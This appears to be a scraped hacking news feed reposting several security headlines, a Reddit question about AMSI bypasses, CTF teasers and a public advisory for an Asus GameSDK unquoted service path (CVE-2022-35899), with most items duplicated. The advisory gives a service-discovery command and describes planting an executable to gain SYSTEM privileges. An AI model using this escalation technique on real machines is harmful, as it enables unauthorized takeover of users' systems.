Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Asus GameSDK 1.0.0.4 Unquoted Service Path
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Asus GameSDK version 1.0.0.4 suffers from an unquoted service path vulnerability in GameSDK.exe.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Asus GameSDK 1.0.0.4 Unquoted Service Path
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Asus GameSDK version 1.0.0.4 suffers from an unquoted service path vulnerability in GameSDK.exe.
SHA-256 |
cd88ac76d033405e5a3e34567ef8fd43237dddbf5f9d43a3e92a2f447d70a461Download
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Info on the service:
C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
# Impact
An attacker can elevate his privileges on the system and become NTAUTHORITY\SYSTEM.
# Poc Video
https://youtu.be/u_8JMIgn-5g
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Asus GameSDK 1.0.0.4 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Spryker Commerce OS Remote Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Spryker Commerce OS Remote Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Spryker Commerce OS Remote Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
My Essential Recon Commands
https://medium.com/@xsanjay/my-essential-recon-commands-93d37f4e1b91?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@xsanjay/my-essential-recon-commands-93d37f4e1b91?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Essential Recon Commands
Resolution
ResolutionContinue reading on Medium » (https://medium.com/@xsanjay/my-essential-recon-commands-93d37f4e1b91?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Essential Recon Commands
Resolution
The AMSI bypass i got from CRTP doesn't work, any help?
https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/
just signed for the CRTP and their AMSI bypass doesnt work on their lab, tried a bunch of bypasses from github as well and none worked, help ? submitted by /u/watermelonSoundsNice (https://www.reddit.com/user/watermelonSoundsNice)
[link] (https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/) [comments] (https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/
just signed for the CRTP and their AMSI bypass doesnt work on their lab, tried a bunch of bypasses from github as well and none worked, help ? submitted by /u/watermelonSoundsNice (https://www.reddit.com/user/watermelonSoundsNice)
[link] (https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/) [comments] (https://www.reddit.com/r/Pentesting/comments/w31wnt/the_amsi_bypass_i_got_from_crtp_doesnt_work_any/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
The AMSI bypass i got from CRTP doesn't work, any help?
just signed for the CRTP and their AMSI bypass doesnt work on their lab, tried a bunch of bypasses from github as well and none worked, help ?
Dark Reading: Attacks/Breaches
Okta Exposes Passwords in Clear Text for Possible Theft
Researchers say Okta could allow attackers to easily exfiltrate passwords, impersonate other users, and alter logs to cover their tracks.
___________________________
@hacking_Attack
@Hacking_Video
Okta Exposes Passwords in Clear Text for Possible Theft
Researchers say Okta could allow attackers to easily exfiltrate passwords, impersonate other users, and alter logs to cover their tracks.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Okta Exposes Passwords in Clear Text for Possible Theft
Researchers say Okta could allow attackers to easily exfiltrate passwords, impersonate other users, and alter logs to cover their tracks.
Dark Reading: Attacks/Breaches
Startup Aims to Secure AI, Machine Learning Development
With security experts warning against attacks on machine learning models and data, startup HiddenLayer aims to protect the neural networks powering AI-augmented products.
___________________________
@hacking_Attack
@Hacking_Video
Startup Aims to Secure AI, Machine Learning Development
With security experts warning against attacks on machine learning models and data, startup HiddenLayer aims to protect the neural networks powering AI-augmented products.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Startup Aims to Secure AI, Machine Learning Development
With security experts warning against attacks on machine learning models and data, startup HiddenLayer aims to protect the neural networks powering AI-augmented products.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Offensive Security “Sar” Makinesi Çözümü
https://cdn-images-1.medium.com/max/1200/0*AJsGOZIg1uezX3wB.png
Merhabalar. Bu yazı da Offensive Security şirketinin hazırlamış ve yayınlamış olduğu “Sar” makinesini nasıl çözdüğümü anlatacağım.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Offensive Security “Sar” Makinesi Çözümü
https://cdn-images-1.medium.com/max/1200/0*AJsGOZIg1uezX3wB.png
Merhabalar. Bu yazı da Offensive Security şirketinin hazırlamış ve yayınlamış olduğu “Sar” makinesini nasıl çözdüğümü anlatacağım.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Offensive Security “Sar” Makinesi Çözümü
Merhabalar. Bu yazı da Offensive Security şirketinin hazırlamış ve yayınlamış olduğu “Sar” makinesini nasıl çözdüğümü anlatacağım.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HTTP Method | Defend the Web
https://cdn-images-1.medium.com/max/700/0*9pUIkyLyGVNtp13y.jpg
Cross site request forgery is the term you’ll need to google
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HTTP Method | Defend the Web
https://cdn-images-1.medium.com/max/700/0*9pUIkyLyGVNtp13y.jpg
Cross site request forgery is the term you’ll need to google
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTTP Method | Defend the Web
Cross site request forgery is the term you’ll need to google
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El FBI advierte sobre aplicaciones de criptomonedas falsas utilizadas para defraudar a los…
https://cdn-images-1.medium.com/max/1671/0*UE09t3lsXMKNrjjn
PUBLICADO EN 18 JULIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El FBI advierte sobre aplicaciones de criptomonedas falsas utilizadas para defraudar a los…
https://cdn-images-1.medium.com/max/1671/0*UE09t3lsXMKNrjjn
PUBLICADO EN 18 JULIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El FBI advierte sobre aplicaciones de criptomonedas falsas utilizadas para defraudar a los inversores
PUBLICADO EN 18 JULIO, 2022POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Imaginary CTF 2022: Democracy Unique Solution Writeup (Web)
https://cdn-images-1.medium.com/max/1439/1*KWerDV3gBKuZpW6Fug2r6g.png
Okay, so this challenge got shut down during the CTF (probably because the website kept breaking due to everyone attacking it), so I…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Imaginary CTF 2022: Democracy Unique Solution Writeup (Web)
https://cdn-images-1.medium.com/max/1439/1*KWerDV3gBKuZpW6Fug2r6g.png
Okay, so this challenge got shut down during the CTF (probably because the website kept breaking due to everyone attacking it), so I…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Imaginary CTF 2022: Democracy Unique Solution Writeup (Web)
Okay, so this challenge got shut down during the CTF (probably because the website kept breaking due to everyone attacking it), so I didn’t…